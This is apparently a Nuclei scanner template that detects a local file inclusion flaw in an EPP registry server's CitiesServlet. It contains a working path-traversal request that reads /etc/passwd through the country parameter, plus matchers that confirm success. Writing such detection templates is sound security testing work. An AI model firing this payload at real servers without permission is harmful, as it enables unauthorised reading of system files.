id: epp-server-lfi

info:
  name: EPP Server - Local File Inclusion
  author: DhiyaneshDK
  severity: high
  description: |
    servlet called "CitiesServlet" that handles HTTP GET requests, so the user-provided input, obtained from the country parameter, is directly concatenated with the "/cities/cities_" string to form the fileName, This means an attacker can manipulate the country parameter and potentially access arbitrary files on the server's file system
  reference:
    - https://hackcompute.com/hacking-epp-servers/
  metadata:
    max-request: 1
  tags: epp,cocca,registry

http:
  - method: GET
    path:
      - "{{BaseURL}}/cities?country=/../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header
        words:
          - application/json

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100ca418246706517069886a69d40a7ad16e15c996b6cef4dd806775eb626445f82022010bd7947674471cfc03c5416734e6d982dc658df44722f3778419e90ccf610b6:922c64590222798bb761d5b6d8e72950
